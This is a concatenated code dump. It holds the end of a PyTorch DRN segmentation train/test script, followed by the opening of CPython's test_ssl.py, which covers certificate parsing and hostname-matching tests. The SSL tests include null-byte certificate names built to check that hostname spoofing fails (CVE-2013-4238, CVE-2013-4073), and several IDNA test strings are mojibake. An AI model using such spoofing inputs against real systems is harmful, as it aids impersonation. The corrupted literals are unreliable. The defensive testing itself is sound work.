validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
logger.info('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
checkpoint_path = 'checkpoint_latest.pth.tar'
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % 1 == 0:
history_path = 'checkpoint_{:03d}.pth.tar'.format(epoch + 1)
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""
Sets the learning rate to the initial LR decayed by 10 every 30 epochs
"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
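# Illustrative 'poly' values (assuming lr=0.01 and epochs=100): epoch 0 -> 0.01,
# epoch 50 -> 0.01 * 0.5**0.9 ~= 0.0054, epoch 99 -> 0.01 * 0.01**0.9 ~= 1.6e-4.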
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
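# Worked example (illustrative): with n = 2, label = [0, 0, 1, 1] and
# pred = [0, 1, 1, 1], fast_hist returns [[1, 1], [0, 2]], so per_class_iu
# gives [1 / (2 + 1 - 1), 2 / (2 + 3 - 2)] = [0.5, 0.667].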
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(
pred, name, output_dir + '_color',
TRIPLET_PALETTE if num_classes == 3 else CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
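    # Per-channel threads (below) are preferred over the per-element threads
    # sketched above: PIL does the resizing in C, where the GIL can be
    # released, so a few coarse-grained threads overlap usefully without
    # paying per-pixel thread-creation overhead.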
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
# pdb.set_trace()
outputs = []
for image in images:
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
# _, pred = torch.max(torch.from_numpy(final), 1)
# pred = pred.cpu().numpy()
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, pretrained_model=None,
pretrained=False)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'], std=info['std'])
scales = [0.5, 0.75, 1.25, 1.5, 1.75]
if args.ms:
dataset = SegListMS(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), scales, list_dir=args.list_dir)
else:
dataset = SegList(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir, out_name=True)
test_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
logger.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
out_dir = '{}_{:03d}_{}'.format(args.arch, start_epoch, phase)
if len(args.test_suffix) > 0:
out_dir += '_' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
logger.info('mAP: %f', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(description='')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default=None, required=True)
parser.add_argument('-l', '--list-dir', default=None,
help='List dir to look for train_images.txt etc. '
'It is the same with --data-dir if not set.')
parser.add_argument('-c', '--classes', default=0, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--lr-mode', type=str, default='step')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained', dest='pretrained',
default='', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--bn-sync', action='store_true')
parser.add_argument('--ms', action='store_true',
help='Turn on multi-scale testing')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('--test-suffix', default='', type=str)
args = parser.parse_args()
assert args.classes > 0
print(' '.join(sys.argv))
print(args)
if args.bn_sync:
drn.BatchNorm = batchnormsync.BatchNormSync
return args
def main():
args = parse_args()
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
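# Typical use in the tests below (illustrative): wrap a plain socket with a
# one-off context, e.g.
#   ss = test_wrap_socket(socket.socket(socket.AF_INET),
#                         cert_reqs=ssl.CERT_REQUIRED, ca_certs=SIGNING_CA)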
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'pรผthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in the first fragment and IDNA A-labels in subsequent
        # fragments are supported.
idna = 'www*.pythรถn.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythรถn.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'pythรถn.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
